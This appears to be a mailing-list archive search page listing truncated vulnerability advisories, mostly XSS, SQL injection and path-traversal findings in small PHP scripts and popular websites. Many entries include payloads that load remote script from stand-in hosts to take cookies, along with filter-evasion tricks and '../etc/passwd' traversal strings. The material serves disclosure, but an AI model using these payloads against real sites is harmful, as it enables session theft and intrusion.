Nwom topsites v3.0
http://www.nwom.net
Vulnerable files:
Comment input.
index.php
SQL info released on error:
http://www.example.com/index.php?o='
XSS:
http://www.example.com/index.php?o=
- Luny
results.php will execute as well.
- Luny
e.com/yald.php?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E
- Luny
OZJournal v1.5
Homepage:
http://ozjournals.awardspace.com/index.php
Affected files:
search input box
index.php
viewing archives
show comment page
XSS vulnerability via search input box:
Data isn't properly sanatized before being displayed. For
Orbitmatrix PHP Script v1.0
Homepage:
http://www.orbitcoders.com/
Affected files:
index.php
Possible SQL injection?:
http://www.example.com/index.php?page_name='
And by trying a XSS vuln as shown below on page_name we see the query below
which is displayed on screen:
http://www.exampl
Photocycle v1.0
Homepage
http://adambrown.info/p/tools/photocycle
XSS vuln on phpage var:
PoC
http://www.example.com/photocycle&phpage=http://www.youfucktard.com/xss.js>
Advanced Guestbook v1.0
Homepage:
http://www.sport-slo.net/
Affected files:
guestbook.php
---
XSS vuln on guestbook.php:
Data isn't sanatized before being submit to guestbook.txt and displayed
onscreen. The code:
if($_POST['action'])
{
TigerTom Scripts
Homepage:
http://www.ttfreeware.co.uk/
Affected files:
TTCalc script v1.0
---
Data pased in the "Length of loan, years" and "Length of mortgage, years" input
boxes are not sanatized before being generated.
For a PoC in the input boxes listed ab
Shopping Cart V0.9
Homepage:
http://glendown.de/shop/
Affected files:
index.php
editshop.php
edititem.php
-
XSS vuln on editshop.php & edititem.php:
Data isn't sanatized before being entered. For a PoC as a shop name or item
enter in:
alert('
mAds v1.0
Homepage:
http://lowpricescripts.com/product_info.php?products_id=51
Affected files:
*Searching
---
XSS vuln when searching:
Like the hotbot XSS vuln, when searching mAds returns with its results they are
generated dynamically on screen, with
Buddy Zone Version 1.0.1
Homepage:
http://www.vastal.com/buddy-zone-social-networking-script.html
Affected files:
*Sending invitations
*Profiles
*Blogs
*Journals
*Posting comments
*Posting in the forum
*Sending mail
*Creating a group
view_sub_forum.php
view_post.php
view_classified
ezWaiter v3.0
Homepage:
http://www.ezwaiter.com/
Affected files:
Placing an order
login.php
---
XSS vuln when placing an order:
User input is not sanatized before being generated. For a PoC in the two boxes
labeled
"Who is this item for?" and "
PHPClassifieds General v.n/a
Homepage:
http://www.phpclassifieds.info/
Affected files:
search.php
*Posting classified ads
-
SQL injection on search.php via rate var:
http://www.example.com/search.php?rate=[sql]
-
Usenet Script v0.5
Homepage:
http://www.metalhead.ws/usenet
Description:
"Those scripts allow you to mirror a Newsgroup in an SQL database. The
development database was Postgresql, but it uses dbx and should therefore be
able to work with other database systems, too. Furthermore, a fronten
Winged Gallery v1.0
Homepage:
http://winged.info/index.php?p=gallery
XSS vuln on thumb.php:
http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg";>''>">">">http://youfucktard.com/xss.js><"<'<'<'<'&size=75&type=2&w=128&h=128">''>">">">
Somechess v1.5 rc1
Homepage:
http://www.astrodogpress.org/chess/
Affected files:
*Profile input boxes
---
Upon dumping the sql data into the table if you get errors and it wont create
the tables & data (like it did to me), then just remove all the " from the sql
file
cjGuestbook v1.3
Homepage:
http://cmj-php.opanelhosting.com
Affected files:
* posting in the guestbook
XSS vuln with cookie disclosure:
cjGuestbook uses bbcode, and since theres a vulnerability in early editions of
bbcode we can achieve our XSS example.
For a PoC put in as your commen
V3 Chat Instant Messenger
http://www.v3chat.com/
Affected files:
/mail/index.php
/mail/reply.php
is_online.php
online.php
profile.php
profileview.php
search.php
mycontacts.php
expire.php
* Editing your profile:
- input boxes
--
Mail Vuln
MPCS v0.2
Homepage:
http://tpvgames.co.uk/mpcs
Affected files:
comment.php
XSS vuln with cookie & full path disclosure:
Direct html injection doesnt seem to work, however, if you navigate to the code
below in your browser, and then post a comment on the same page, our XSS
example will
Dragons Kingdom Script v1.0
Homepage:
http://www.dkscript.com/
Affected files:
*Sending mail:
- Sending in-game mail
*Character Profiles:
- All input boxes of the profile
* Posting & Replying in the forum:
- Posting in the forum
- Replying in the forum
* Form spoofing can occur i
Technorati.com
Homepage:
http://www.technorati.com
Affected files:
login box
Creating a new account input boxes
Login box XSS vuln:
By escaping quotes and using script tags, we can acomplish our XSS example. For
PoC try putting the following code in the login box:
">">">">'>'>'>"><""
43things.com
Homepage:
http://www.43things.com
Affected files:
input box "I want to add to my list"
posting a comment
XSS vuln via input text of the box "I want to"
When you add an item thats already on your list.
For a PoC we have style
Blogspot.com
Homepage:
http://www.blogspot.com
Affected files:
Blog input boxes
--
XSS vuln via Display name input box.
Blogger doesnt properally sanatize user input before generating it. For
example, you can't use illegal characters in your user
Biblenet.net
Homepage:
http://www.biblenet.net
Affected files:
gettinginvolved.html
register.php
member.php
/library/index.html
-
Biblespace uses vBulletin for most of their site, so most of these vulns are
based in the vbulletin site themselves,
B3ta.com
Homepage:
http://www.b3ta.com
Affected files:
Input boxes of your profile
XSS vuln with cookie disclosure via Profile: box.
Data isn't correctly sanatized before being generated. We can bypass the
filters of the site one way by using img tags and converting our javascript to
U
Facetherating.com
Homepage:
http://www.facetherating.com
Affected files:
showprofile.php
XSS vuln via showprofile.php:
The site does the typical filtering of adding backslashes to ' and " so We'll
try something different this time and use a fromCharCode.
http://www.facetherating.com/s
Ratemylook.co.uk
Homepage:
http://www.ratemylook.co.uk
Affected files:
user.php4
top.php4
hot.php4
toponline.php4
user.php4 XSS vuln with cookie disclosure:
http://www.ratemylook.co.uk/user.php4?uid=1150190681&mode=own";>">">'>http://yo
About.com
Homepage:
http://www.about.com
Effected files:
Search input box
fullsearch.htm
shortform.htm
forum.aspx
profile_center.asp
posting in the forum
---
Search input box xss vuln with cookie disclosure:
Works by putting the tags in the input box,
Ratescene.co.uk
Homepage:
http://www.ratescene.co.uk
Affected files:
input boxes of editing your profile
Profile input boxes XSS vuln with cookie disclosure:
Data isn't sanatized, try entering the code below:
Screenshots:
http://www.
Windowsitpro.com
Homepage:
http://www.windowsitpro.com
Effected files:
Search input box
Downloading whitepapers
Search input box xss vuln with cookie disclosure:
We convert our javascript to hex format so we don't recieve the default "Your
request cannot be processed as this time" error
Facerave.com
Homepage:
http://www.facerave.com
Effected files:
* Profile input boxes
- Self Description box
* Posting a blog entry
* Sending a message
index.php
--
XSS vuln with cookie disclosure via posting a comment:
No filte
Hotscripts.com
Homepage:
http://www.hotscripts.com
Effected files:
search input box
adding a review
Editing your profile
sending a author a message.
Creating a new listing
XSS vuln with cookie disclosure in search input box:
For a PoC try p
hi5.com
Homepage:
http://www.hi5.com
Affected files:
Input boxes of editing your profile.
XSS Vuln with cookie disclosure:
It seems hi5.com allows alot of html tags to be used on thier site but they
will filter out words like javascript, applet, and iframe tags (which is to be
expected
Cybersocieties.com
Homepage:
http://www.cybersocieties.com
Effected files:
* Input boxes in profile:
- Full name box
- Occupation box
- MSN box
- Yahoo box
- AIM Box
* Viewing a profile
--
XSS vuln via input boxes in profile:
Apnaspace.com (A myspace type site for arab & indian teens)
Homepage:
http://www.http://www.apnaspace.com
Effected files:
* Comment input box:
* Posting a blog entry:
- Entry title
- Entry body
* Viewing a profile
* Posting a bulletin.
* Commenting on a picture
* Sending mail to
Dealgates.com
Homepage:
http://www.dealgates.com
Affected files:
*Input boxes when registering new account
* Search box
-
XSS vuln with cookie disclosure when registering a new account.
To bypass the adding backslashes to ; and ", we use the long U
Housecarers.com
Homepage:
http://housecarers.com
Affected files:
* Posting a Housesit:
- City/Town box
- County/District box
- Suburb box
- City/Town Area box
* Searching for housesitters
* Sending messages to house sitters.
* Viewing member profiles
---
Bingbox.com
Homepage:
http://www.bingbox.com
Affected files:
* Profile input boxes:
- City input
* Registering
* Viewing Birthdays
* Adding a friend
* Viewing people online
---
XSS with cookie disclosure via inviting friends:
http://w
Youtube.com
Homepage:
http://www.youtube.com
Affected files:
* Search box input
* Adding a new blog:
- Blog name
XSS Vuln with cookie disclosure via search box:
Data isn't sanatized when using the search box. For PoC input:
http://www.youfucktard.com/xss.js>
PoC link:
http://
Blacksingles.com
Homepage:
http://www.blacksingles.com
Affected files
Profile input boxes
Add a friend input box.
list.html
view.html
reply.html
compose.html
-
XSS vuln with cookie disclosure via the Location box.
User data isn't sanat
Chatizens.com Also known as Chattown.com
Homepage:
http://www.chatizens.com
Affected files:
* Profile input boxes:
All input boxes of your profile.
* Browsing the forums
XSS vuln with cookie disclosure via profile input boxes.
To bypass c
Boardhost.com
Description:
Free Msgboard hosting service.
Homepage:
http://www.Boardhost.com
Affected files
Input boxes of posting a message
Searching for a listing board
-
XSS vuln with cookie disclosure when posting a msg (Tested on
MP3 Search/Archive v1.2
Homepage:
http://www.bloodys.com
Affected files:
Search input box.
index.php
Data is not properally sanatized before its generated. For PoC try putting the
code below in the search box:
http://youfucktard.com/xss.js>
Screenshots:
http://www.youfucktard.co
Emllabs.com
Effected files:
articles.php
search input box.
The search input box doesnt properally filter user input. for PoC try putting
in: [SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
XSS Vulnerability:
http://previous.emllabs.com/articles.php?navCur=[SCRIPT%20SRC=http://evils
Yourfacesucks.com
Homepage:
http://www.yourfacesucks.com
Effected files:
music/video input boxes in editing profile
subject box of sending a PM
thread.php
---
XSS Vuln with cookie disclosure in profile input boxes:
No filter evasion needed here. Fo
Meefo.com
Homepage:
http://meefo.com
Effected files:
reading profiles
index.php
input boxes onprofiles
sending private msgs
--
Reading aprofile and with cookie include PoC:
Since data isn't properlly filtered (backslashes are added to ' and "), a user
can
Vampirefreaks.com
Homepage:
http://www.vampirefreaks.com
Effected files:
input boxes of editing your profile
posting a journal entry.
Commenting
XSS Vulnerability:
Data isn't properly filtered when editing your profile. One way to bypass the
filter is to escape quotes and useclosing b
Virtualtourist.com
Homepage:
http://www.virtualtourist.com
Effected files:
Input boxes of your profile
search destination input box
---
XSS vulnerability with cookie disclosure:
Under the section of "Tell others a little about yourse
Onlinenode.com
Homepage:
http://www.onlinenode.com
Effected files:
node_category.php
node_article.php
webpage.php
guestbook.php
journal.php
pictures.php
chatroom.php
---
XSS Vuln via node_category.php:
One way to archive this is to use black tags with an op
Stargazer.org
Homepage:
http://www.stargazer.org
Effected files:
login box
registration boxes
creating a survey
---
Login box & registration XSS Vuln:
for proof of concept just try adding:
'';!--"=&{()}http://youfucktard.com/xss.js>'';!--"=&{()
Cescripts.com Scripts
Below are scripts I tested from the site cescripts.com. This site seels to be
selling canned scripts, full of errors. Anyways, take a look:
Car Classifieds
Homepage:
http://www.cescripts.com/
effected files:
index.php
XSS Vulnerabilities PoC:
Viewing a car:
htt
Wireclub.com
Homepage:
http://www.wireclub.com
Effected files:
input boxes of editing a profile
XSS Vuln with no filter evasion at all:
We notice that when trying to put a url in the Open line about yourself input
box, we get the msg "no urls allowed" as well as "the field cannot cont
Nowtalking.com
Homepage:
http://www.nowtalking.com
Effected files:
input boxes of logging in and searching
friends-new.asp
gallery.asp
friends.asp
gb.asp
JET DB error due to injection:
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'UserNam
Opengaia.com
Homepage:
http://www.opengaia.com
Effected files:
my_page.php
module.php
editing your profile
the search input box
adding a diary/blog
Just like in onlinenode.com's vulnerabilities, it seems this site filters data
just about the same.
Wanderlist.com
Homepage:
http://www.wanderlist.com
search.cgi
Search box input
adding a item to a list
Search.cgi XSS vuln with sessions disclosure:
By putting a few ending opening tags with quotes beforeand after,we are able
create a XSS example:
">">">'http://youfucktard.com/xss.js
Myscrapbook
Homepage:
http://www.pixytrix.com/myscrapbook/
Effected files:
singlepage.php
---
Full path error with viewing most files in the txt-db-api dir:
Warning: main(API_HOME_DIRutil.php): failed to open stream: No such file or
directory in /
5 Star Review Script
Homepage:
http://www.review-script.com/
Effected files:
index2.php
report.php
search box
editing your profile
posting a review.
--
index2.php XSS Vuln with cookie disclosure:
By ending quotes and using a few closing and opening tag
Diaryland.com
Homepage:
http://www.diaryland.com
Effected files:
input boxes on creating diary entries.
posting comments in diary entries
XSS Vuln PoC:
With no filter evasion at all, we simply put as our entry:
[SCRIPT SRC=http://youfucktard.com/xss.js][/SCRIPT]
Screenshots:
http://
Mydeardiary.com
Homepage:
http://www.mydeardiary.com
Effected files:
search input boxes
Adding new diary entries
--
We create our XSS example by ending quotes with tags before and after:
">">">'>http://youfucktard.com/xss.js><"<"<"<"<"
Screensho
Tempinbox.com
Homepage:
http://www.tempinbox.com
Effected files:
checkmail.pl
Description:
Tempinbox.com is a free throw away, no sending email service. You enter an
account name and you can instantly check email.
XSS Vulnerability:
It seems the title of emails and subjects are not s
AsianXO.com
Homepage:
http://www.asianxo.com/
Effected files:
directory.php
profiles.php
Input boxes of editing profile
XSS Vulnerability via dir_id:
Directory.php PoC:
http://www.axo2.com/directory.php?dir_id=1";>http://evilsite.com/xss.js><"
Profiles.
fx-APP Version 0.0.8.1
Homepage:
http://fx-app.org/
Effected files:
search input box
index.cgi
input boxes on your profile
adding a menu item
---
I noticed there was already several BID's on the a script WebAPP:
http://search.secur
Ringlink v3.2
Homepage:
http://www.ringlink.org
Effected files:
next.cgi
stats.cgi
list.cgi
XSS Vulnerability PoC:
http://www.example.com/ringlink/next.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')]
http://www.example.com/ringlink/stats.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')]
ST AdManager Lite v1
Homepage:
http://www.site-trade.com/index.php
Effected files:
index.php
submit.php input form
XSS Vulnerabilities:
submit.php input forms do not correctly sanatize user input before submitting
it to be checked by an admin and then published. This in turn to allow a u
P.A.I.D v2.2
Homepage:
http://www.webexceluk.net
Effected files:
faq.php
input form of logging in.
index.php
The input forms of logging into My Account do not sanatize user input. For PoC
of a XSS attack simply put in:
"><"
It also seems when logging in, even if your details are incor
TinyMuw v1.0
Homepage:
http://www.l0j1k.com/tinyMuw/index.php
Effected files:
quickchat.php input box
videoPage.php
Input isn't sanatized before being generated in the quickchat.php chatbox. For
PoC try putting:
in as your comment.
Full path disclosure error via URL Injection:
http:
MobeSpace v2.0
Homepage:
http://mobescripts.com/
Effected files:
index.php
The input forms of:
- Profile
- Comments
- Uploading a file to your locker
- Posting in your blog
- Creating a caption for your pic
- Sending PM's
The input boxes of the above do not sanatize user input befo
Ticket Booking Script
Homepage:
http://www.mole.com.ua
Effected files:
input boxes on booking2.php
XSS Vulnerabilities:
The input boxes on booking2.php do not sanatize userinput before geenrating it
and then submitting it to a MySQL db. This can causes XSS examples as well as
possible S
Booking Script.
Homepage:
http://www.mole.com.ua
PError with full path disclosure and possible buffer overflow?:
http://www.example.com/week.php?year=2006&month=06&day=0'
Warning: checkdate() expects parameter 2 to be long, string given in
/home/httpd/vhosts/domain/subdomains/booking/http
phazizGuestbook v2.0
Homepage:
http://www.devhome.de/#english_version
Effected files:
input boxes of name, email, url, text.
XSS Vulnerability:
None of these input boxes sanatize user input before generating it. for PoC put
in any of the above boxes.
iFoto v0.20-06/06/06
Homepage:
http://ifoto.ireans.com/
Effected files:
XSS Vulnerability:
The dir path to show the image is base 64 encoded, so to attempt this XSS
example we encode our codein base64.
The code we'll be using is javascript in an iframe tag. [IFRAME
SRC="javascript:aler
OkMall v1.0
Homepage:
http://www.okscripts.com/
Effected files:
search.php
XSS Vulnerabilities:
The search inputbox doesnt properally filter using input before generating it.
Backslashes areadded but we can easily
evade this.
ForPoC try putting a [imgsrc=lol.jpg]in the search box.
Ez Ringtone Manager
Homepage:
http://www.scriptsez.net
Effected files:
player.php
search input box.
XSS Vulnerabilities:
http://example.com/ringtones/player.php?action=preview&id=http://evilsite.com/xss.js>&cat=LG%20Mobiles
The search box doesnt properlly filter user input. Tags like
E-Dating System
Homepage:
http://www.scriptsez.net/
Effected files:
Input boxes.
cindex.php
Description:
A Professional dating system that uses flatfiles instead of MySQL.
XSS Vulnerabilities PoC:
The input boxes of sending a message, and editing your profile do not
properally filt
Easy Ad-Manager v. (unknown, not listed on homepage)
Homepage:
http://www.scriptsez.net
Effected files:
details.php
XSS Vulnerability with full path disclosure:
http://www.example.com/eam/details.php?do=load&mbid=/http://evilsite.com/xss.js>
Warning: fopen(stats//This is remote text via
Chemical Directory v.unknown (doesnt say on website)
Homepage:
http://www.scriptsez.net/
Effected files:
dictionary.php
XSS Vulnerability via keyword variable:
http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT
SRC=http://evilsite.com/xss.js][/SCRIPT]
vSCAL and vREAL v1.0
Homepage:
http://www.babykatiemedia.com/
Effected files:
index.php
myslideshow.php
XSS Vulnerability via lid variable:
http://www.example.com/vscal/index.php?page=showlisting&lid=
XSS Vulnerability via myslideshow.php
http://www.example.com/vscal/myslideshow.php?d
PBLGuestbook v1.31
Homepage:
http://www.pixelatedbylev.com/
Effected files:
input boxes of the guestbook.
XSS Vulnerabilities PoC:
I noticed that common tags like
GANTTy v1.0.3
Homepage:
http://www.gantty.com
Effected files:
index.php
XSS Vulnerabilities PoC:
XSS Vulnerability:
http://www.example.com/index.php?action=login&message=+email&lang=
Full path disclosure error:
http://www.example.com/index.php?action=authenticate&lang='
Error: FILE
ParticleSoft Wiki v1.0.2
Effected files:
input boxes on editing pages:
XSS Proof of concept:
We notice br tags are allowed, so by using a STYLE attribute using a comment to
break up expression we can create a XSS vuln:
Put the following in when editing a page:
Thanks to Rsnake & Rom
ParticleSoft Whois v1.0.3
Homepage:
http://www.particlesoft.net/particlewhois/
XSS Proof of concept viaurl injection:
http://whois.particlesoft.net/index.php?do=runcheck&target=";>http://evilsite.com/scriptlet.html <<"&ext=all
XSS Via input box:
">http://evilsite.com/scriptlet.html <<"
Partial Links v1.2.2
Homepage:
http://www.particlesoft.net/particlelinks/
Effected files:
index.php
page_footer.php
admin.php
Exploits & Vulnerabilities:
Possible directory traversal?:
http://www.example.com/Other_Sites/X_%2526_Y/../../../../../etc/passwd/
SQL Injection:
http://www.
Homepage:
http://www.particlesoft.net/particlegallery/
Effected files:
viewimage.php
viewalbum.php
SQL Injection:
http://www.example.com/viewimage.php?imageid='
XSS Vulnerability proof of concept:
http://www.example.com/viewimage.php?imageid=http://evilsite.com/scriptlet.html>
Possible
Kmita FAQ v1.0
Homepage:
http://www.kmita-faq.com
Effected files:
search.php
index.php
Search.php does not sanatize user input before dynamically genrating it.
Proof of concept:
http://www.example.com/search.php?q=http://evilsite.com/xss.js>
SQL Injection proof of concept:
http://www
LabWiki 1.0
Homepage:
http://www.bioinformatics.org/phplabware/labwiki/index.php
Effected files:
search.php
The search input box does not sanatize user input before dynamically genrating
it.
XSS Proof of concept:
">http://evilsite.com/xss.js><"
MyTrueHood.com
Homepage:
http://www.mytruehood.com
Effected files:
Input boxes of submitting a comment and signing a guestbook
XSS proof of concept:
put in the signing aguestbook or leaving
a comment in a blog box.
PHP ManualMaker v1.0
Homepage:
http://deltascripts.com/phpmanualmaker/
Effected files:
index.php
Search boxes
Comment boxes
XSS proof of concept:
Input in search or comment box:
">">">'><""><'<"
XSS via URL injection of id:
http://www.example.com/manualmaker/index.php?print=1&id=htt
Weblog Oggi v1.0
Homepage:
http://www.hotwebscripts.com/index.php
User input isn't sanatized before being dynamically generated. For proof of
concept just put in as a comment
/somecommand.php?somevariables=maliciouscode>
--
Luny - http://www.youfucktard.com
QontentOneCMS v1.0
homepage:
http://www.qontentone.com/
Effected files:
search.php
input forms
XSS Proof of concept:
http://www.example.com/search.php?search_phrase=";>http://www.evilsite.com/xss.js><"&search=Search
Homepage:
http://www.tuttophp.altervista.org/morrisguest-ing.htm
Description:
Morris Guestbook is a text-based guestbook with the following features: Data
storing on text file, paging of messages on screen, words crypting, counting of
inserted messages, blockage of messages with both html t
Homepage:
http://www.tuttophp.altervista.org/smileguest-ing.htm
Description:
Smile Guestbook is a cool text-based guestbook with smilies inserting and other
features below
Effected files:
view.php
An XSS attack is possible due to no filtering of pagina variable:
http://www.example.com/p
Homepage:
http://www.tuttophp.altervista.org/main.php
Description:
Text-based guestbook with the following features: - Data storing on text file -
Paging of messages on screen - Blockage of messages with words too long into -
Blockage of messages with both html tags(<>) - Validity-checking of
MyYearBook.com - Personal community site like myspace.com
Effected files:
Input forms of:
editing profile
posting a blog
search boxes
posting a bulletin
posting a comment
---
XSS Vulnerabilities proof of concept:
When editing your profile, it seems
>
--
Luny - http://www.youfucktard.com
searchbox:
--
Directory Traversal:
http://www.example.com/make_thumbnail.php?imgpath=../../../../etc/passwd/
------
Luny - http://www.youfucktard.com
PHPSimple Choose v0.3
Homepage:
http://phpsimplechoose.sourceforge.net
Description:
Do you need to add some fun to your site? Look no further. With
PHPSimpleChoose you can let your users input terms and have one randomly
choosen. Every bit of text is changeable, and we are working on al
iBoutique.MALL
Homepage: http://www.netartmedia.net/mall/
Description:
Based on iBoutique 4.0, iBoutique.MALL is a powerful multi user mall software
solution. It makes possible for the new vendors to signup and create their own
customized online stores with ease.
Effected files: index.ph
iFlance
Homepage:
http://www.ifusionservices.co.uk/
Description:
iFlance is a powerful freelance script, that allows anyone to run their very
own own professional, profitable
Freelancing website
Effected files:
acc_verify.php
project.php
all input boxes
XSS BY URL Injection of acc_v
Pre News Manager v1.0
Homepage:
http://www.preprojects.com/news.asp
Description:
Effected files:
index.php
news_detail.php
email_story.php
thankyou.php
printable_view.php
tella_friend.php
send_comments.php
Exploits & Vulns:
XSS Vulnerabilities:
By inserting alert("XSS")"> onto
1 - 100 of 122 matches
Mail list logo